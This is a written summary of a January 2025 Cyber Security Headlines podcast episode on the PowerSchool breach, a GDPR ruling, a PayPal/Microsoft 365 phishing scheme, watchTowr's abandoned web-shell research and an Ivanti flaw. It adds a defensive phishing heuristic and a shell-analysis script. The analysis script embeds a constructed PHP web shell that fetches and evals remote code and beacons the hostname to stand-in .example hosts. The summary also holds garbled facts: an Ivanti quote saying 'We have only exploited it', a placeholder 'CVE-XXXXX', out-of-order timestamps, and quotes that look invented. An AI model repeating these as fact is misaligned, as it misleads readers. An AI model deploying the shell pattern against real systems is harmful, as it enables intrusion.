Cyber Security Headlines: PowerSchool Hacked, Cyber Force Study, EC Gets GDPR Fine
Hosted by CISO Series | Release Date: January 9, 2025
In this episode of Cyber Security Headlines, host Rich Stroffolino delves into the latest developments in the information security landscape. Covering significant breaches, legislative movements, regulatory fines, and emerging threats, this episode provides a comprehensive overview for cybersecurity professionals and enthusiasts alike.
1. PowerSchool Data Breach
Timestamp: [00:07]
Rich Stroffolino kicks off the episode by reporting a major breach involving PowerSchool, the leading edtech provider serving over 50 million students in the U.S. The company announced that on December 28th, threat actors successfully breached a customer support portal using compromised credentials.
- Data Compromised: PowerSchool initially confirmed that names and addresses were taken; depending on the district, the stolen data may also include Social Security numbers and other personally identifiable information (PII).
- Company Response: PowerSchool stated in its FAQ that the incident was not a ransomware attack, but it did pay an extortion demand to prevent the data from being leaked.
- Mitigation Efforts: The company is offering credit monitoring to affected adults and identity protection services to minors to guard against misuse of the compromised data.
Quote:
"We did not suffer a ransomware attack, but we did pay an extortion demand to prevent the data from being leaked," reads PowerSchool's FAQ, as quoted by Rich Stroffolino at [00:07].
2. House Lawmakers Explore Cyber Force Study
Timestamp: [02:30]
The episode highlights ongoing legislative efforts to establish a dedicated cyber force within the U.S. military. Representative Morgan Luttrell emphasizes the need for an independent assessment of the feasibility of a cyber force as a potential seventh branch of the armed services.
- Legislative Background: Last year, Luttrell sponsored an amendment to the annual defense policy bill requiring the Pentagon to commission a third-party study on creating a cyber force focused on digital warfare.
- Current Status: Although the bill was signed into law by President Biden, it set no deadline for the assessment, and the resulting delays have frustrated lawmakers.
- Future Prospects: Luttrell voiced frustration with the recurring delays and hinted at escalating the issue to higher political figures, including Vice President-elect JD Vance, if the initiative stalls for a third consecutive year.
Quote:
"The lack of a deadline is a huge headache," remarked Representative Luttrell at [02:45].
3. European Commission Fined for GDPR Violation
Timestamp: [04:15]
In a significant ruling, the EU's General Court found that the European Commission (EC) violated the General Data Protection Regulation (GDPR) by transmitting a German citizen's personal data to the U.S.
- Case Details: The individual sued after noticing that using the Facebook sign-in option on an EC event website caused his device, browser, and IP address information to be transmitted to Amazon and Meta.
- Legal Implications: GDPR treats such data as personal information. Although the regulation permits substantial fines for violations, the court ordered the EC to pay the plaintiff €400 in damages.
Quote:
"The European Commission violated GDPR by transmitting personal data without adequate protections," explained Rich Stroffolino at [04:15].
4. PayPal Fraud Scheme Exploits Microsoft 365 Features
Timestamp: [05:50]
Fortinet CISO Carl Windsor shed light on a sophisticated phishing campaign exploiting Microsoft 365's features to perpetrate fraud through PayPal.
- Attack Vector: Threat actors register free Microsoft 365 test domains and send the lures from them. Because the messages originate from legitimate Microsoft-owned infrastructure, they typically pass standard email security checks.
- Methodology: Victims receive spoofed PayPal money requests that appear to come from a billing department. Following the embedded link and logging in to PayPal links the victim's account to the attacker's, enabling account takeover.
- Defense Recommendations: Windsor urges users to remain vigilant and apply common sense to suspicious sender addresses, even when a message has passed basic spam filtering.
Quote:
"Use common sense on fishy-looking email addresses, even if they get past basic spam filters," advised Carl Windsor at [05:50].
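Windsor's point is that a message can clear SPF, DKIM and DMARC and still be a lure, so a mailbox-side check has to look at other traits. The following is an added example for this summary, not Fortinet's, PayPal's or Microsoft's code: it parses a constructed message and flags the traits this campaign turns on (payment-request language, authentication that passes cleanly, and a recipient address that is not the victim's own mailbox). The check for `.onmicrosoft.com` recipients reflects the trial-tenant addresses Fortinet reported for this campaign; every header, address and IP below is constructed, and the quarantine rule is an assumption of this example rather than vendor guidance.

```python
"""Mailbox-side heuristics for PayPal money-request lures relayed through
Microsoft 365 tenants. Added example for this summary; not Fortinet's or
PayPal's code. All sample headers, addresses and IPs are constructed."""
import re
from email import message_from_string
from email.utils import getaddresses

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)
MONEY_REQUEST_RE = re.compile(
    r"money request|payment request|request(ed)? (a )?payment|you owe", re.IGNORECASE)
# Assumption (from Fortinet's report of this campaign): the lure was relayed
# through a free trial tenant, whose default mail domain is *.onmicrosoft.com.
DEFAULT_TENANT_SUFFIX = ".onmicrosoft.com"

# Constructed sample: the request authenticates cleanly because PayPal really
# sent it; the tell is that it was addressed to a list, not to our mailbox.
SAMPLE_MESSAGE = """\
Authentication-Results: spf=pass (sender IP is 203.0.113.10) smtp.mailfrom=paypal.com; dkim=pass header.d=paypal.com; dmarc=pass action=none header.from=paypal.com
From: "service@paypal.com" <service@paypal.com>
To: Billing Department <billingdepartments1@example-tenant.onmicrosoft.com>
Subject: Money request from PayPal: USD 2,185.96
Content-Type: text/plain; charset="utf-8"

You have a new money request from Billing Department.
Log in to PayPal to review and pay this request.
"""

# Constructed sample: ordinary mail addressed to the mailbox directly.
BENIGN_MESSAGE = """\
Authentication-Results: spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com
From: Alice <alice@example.com>
To: victim@example.com
Subject: Q1 budget summary
Content-Type: text/plain; charset="utf-8"

Hi, the Q1 budget summary is in the shared folder. Thanks!
"""


def parse_auth_results(header):
    """Map each authentication method to its result, e.g. {'spf': 'pass'}."""
    return {method.lower(): result.lower() for method, result in AUTH_RE.findall(header or "")}


def visible_recipients(msg):
    """Lower-cased addresses from To and Cc (what the victim actually sees)."""
    addrs = []
    for field in ("To", "Cc"):
        addrs.extend(addr.lower() for _, addr in getaddresses(msg.get_all(field, [])))
    return addrs


def body_text(msg):
    """Concatenate the text/plain parts of a message."""
    chunks = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True)
            if payload:
                chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def assess(raw_message, mailbox):
    """Return the list of suspicious traits found for the given recipient mailbox."""
    msg = message_from_string(raw_message)
    findings = []
    recipients = visible_recipients(msg)
    if mailbox.lower() not in recipients:
        findings.append("not_addressed_to_mailbox")  # reached us via a list or BCC
    if any(addr.endswith(DEFAULT_TENANT_SUFFIX) for addr in recipients):
        findings.append("recipient_is_default_m365_tenant_domain")
    if MONEY_REQUEST_RE.search(msg.get("Subject", "") + "\n" + body_text(msg)):
        findings.append("money_request_language")
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    if findings and all(auth.get(m) == "pass" for m in ("spf", "dkim", "dmarc")):
        # A clean pass is expected for this lure and must not count as exoneration.
        findings.append("authenticated_but_suspicious")
    return findings


def should_quarantine(findings):
    """Hold payment requests that did not arrive addressed to the mailbox itself."""
    return "money_request_language" in findings and (
        "not_addressed_to_mailbox" in findings
        or "recipient_is_default_m365_tenant_domain" in findings)


if __name__ == "__main__":
    for label, raw in (("lure", SAMPLE_MESSAGE), ("benign", BENIGN_MESSAGE)):
        found = assess(raw, "victim@example.com")
        print(label, found, "quarantine" if should_quarantine(found) else "deliver")
```

The deliberate choice here is that `assess` never treats a passing Authentication-Results header as a reason to lower the score: for this campaign a clean pass is the expected state, which is exactly why basic filtering lets the message through. The recipient check (is my own address in To or Cc?) is the cheapest signal that a "billing department" request arrived through someone else's distribution list.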
5. Akamai to Terminate CDN Services in China
Timestamp: [06:40]
Akamai Technologies announced it will cease its Content Delivery Network (CDN) services in China by June 30, 2026. This decision is influenced by regulatory challenges and strategic business realignment.
- Migration Support: Akamai will help customers move to Tencent Cloud or Wangsu Science and Technology, and will also support migrations to CDNs outside China.
- Business Shift: CEO Tom Leighton noted on the Q3 earnings call that Akamai is pivoting toward higher-growth areas such as compute and security services, which now make up the majority of the company's revenue.
Quote:
"We are focusing on higher growth areas rather than traditional CDN services in the market," stated Akamai CEO Tom Leighton, as referenced by Rich Stroffolino at [06:40].
6. Shadow IT Challenges for Hackers
Timestamp: [07:30]
Research from watchTowr Labs shows that shadow IT is a problem not only for Chief Information Security Officers (CISOs) but also for hackers. Benjamin Harris and Aliz Hammond detail how the interconnected infrastructure attackers rely on introduces weaknesses of its own.
- Research Findings: The team identified entry points into thousands of live backdoors created by hackers, allowing them to track the compromised hosts and potentially take control of them.
- Implications: Many of these are old web shells that still depend on domains their operators have since abandoned, so whoever controls that infrastructure next inherits access to the hosts still running the shells and can keep the original compromises alive.
Quote:
"We successfully identified entry points into thousands of live backdoors being used by hackers," explained Benjamin Harris at [07:30].
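The practical lesson for a responder is that a web shell found on disk is only the visible half of a backdoor; the other half is whatever remote hosts it loads from or reports to, and those hosts can be registered by anyone once they lapse. The following added example (not watchTowr's code, and not tied to any specific shell from their research) enumerates that remote dependency set from a PHP shell's source, including URLs hidden in base64 literals, and tags each host with the role it plays so the lapsed ones can be prioritised for sinkholing. The shell source is constructed for this example and its domains are reserved `.example` and `.invalid` names that resolve nowhere.

```python
"""Enumerate the remote infrastructure a web shell depends on.
Added example illustrating the idea behind the watchTowr research summarised
above; not watchTowr's code. The shell source is constructed and its domains
are reserved .example / .invalid names that resolve nowhere."""
import base64
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.IGNORECASE)
# String literals that look like base64: shells often hide their URLs this way.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Which PHP call a URL appears in tells us what losing that host would do.
ROLE_HINTS = (
    ("eval", "loader"), ("include", "loader"), ("require", "loader"),
    ("file_get_contents", "fetch"), ("curl_", "beacon"), ("fsockopen", "beacon"),
)

# Constructed sample shell (harmless: nothing here resolves or executes).
ENCODED_URL = base64.b64encode(b"http://legacy-mirror.invalid/helper.php").decode()
CONSTRUCTED_SHELL = (
    "<?php\n"
    '@eval(@file_get_contents("http://cdn-updates.example/stage2.txt")); // second stage\n'
    "$ch = curl_init('https://beacon.example/ping?h=' . gethostname());     // check-in\n"
    "curl_exec($ch);\n"
    'include(base64_decode("' + ENCODED_URL + '"));                            // obfuscated helper\n'
    "?>\n"
)


def _urls_in_line(line):
    """Plain URLs plus any hidden inside base64 literals on this line."""
    found = URL_RE.findall(line)
    for literal in B64_RE.findall(line):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or base64 of something that is not text
        found.extend(URL_RE.findall(decoded))
    return found


def dependency_report(source):
    """Map each remote host to the URLs, roles and line numbers that reference it."""
    report = {}
    for lineno, line in enumerate(source.splitlines(), 1):
        roles = {role for hint, role in ROLE_HINTS if hint in line}
        for url in _urls_in_line(line):
            host = urlparse(url).hostname
            if not host:
                continue
            entry = report.setdefault(host, {"urls": set(), "roles": set(), "lines": set()})
            entry["urls"].add(url)
            entry["roles"].update(roles)
            entry["lines"].add(lineno)
    return report


def hosts_to_check(source):
    """Hosts whose registration and DNS should be verified (and sinkholed if lapsed)."""
    return sorted(dependency_report(source))


if __name__ == "__main__":
    for host, entry in dependency_report(CONSTRUCTED_SHELL).items():
        print(host, sorted(entry["roles"]), sorted(entry["lines"]))
```

The role tags matter when deciding what to do with a lapsed domain: a "loader" host can feed new code to every machine still running the shell, whereas a "beacon" host only receives check-ins, which is the signal watchTowr used to count live backdoors. Checking each host's registration status is a WHOIS or DNS lookup left outside this block so that it runs offline.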
7. Ivanti Alerts on Connect Secure Vulnerability
Timestamp: [07:55]
Ivanti has issued a warning regarding the exploitation of a Connect Secure remote code execution vulnerability (CVE-XXXXX) by threat actors aiming to install malware on affected appliances.
- Affected Products: The vulnerability affects Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways; however, exploitation observed so far has been confined to Ivanti Connect Secure appliances.
- Response Measures: Ivanti has released a fix in firmware version 22.7R2.5, and customers are urged to update immediately.
Quote:
"We have only exploited it on Ivanti Connect Secure appliances," confirmed Ivanti at [07:55].
8. Follow-Up: ICAO and Green Bay Data Breaches
Timestamp: [07:40]
- International Civil Aviation Organization (ICAO): The agency recently confirmed a data breach in which 42,000 records were stolen from its recruitment database. The compromised data includes names, email addresses, dates of birth, and employment history; no financial information or passwords were affected.
- Green Bay Packers Online Store: A payment skimmer compromised 8,514 customer accounts, including 16 belonging to Maine residents. Victims were notified on January 6th and offered three years of credit monitoring.
Quote:
"Threat actors stole 42,000 records from ICAO's recruitment database," reported Rich Stroffolino at [07:40].
9. Upcoming Episode: AI's Role in Cybersecurity
Timestamp: [08:00]
Looking ahead, Rich Stroffolino teases the next episode titled "Is AI Benefiting Attackers or Defenders?" This episode will explore how adversaries and defenders are leveraging artificial intelligence in the ongoing cybersecurity battle, questioning whether AI provides one side with a significant advantage or simply continues the traditional cat-and-mouse dynamic.
Quote:
"We've been mired in endless discussions on how adversaries and defenders are, or could be taking advantage of AI," hinted Rich Stroffolino at [08:07].
Conclusion
Today's episode of Cyber Security Headlines encapsulates critical incidents and trends shaping the cybersecurity domain. From large-scale data breaches and legislative initiatives to sophisticated phishing schemes and vulnerabilities within major platforms, the episode underscores the dynamic and ever-evolving challenges faced by organizations and individuals alike. Stay tuned for more insights and detailed analyses in upcoming episodes.
For more in-depth stories and daily updates, visit CISOseries.com.
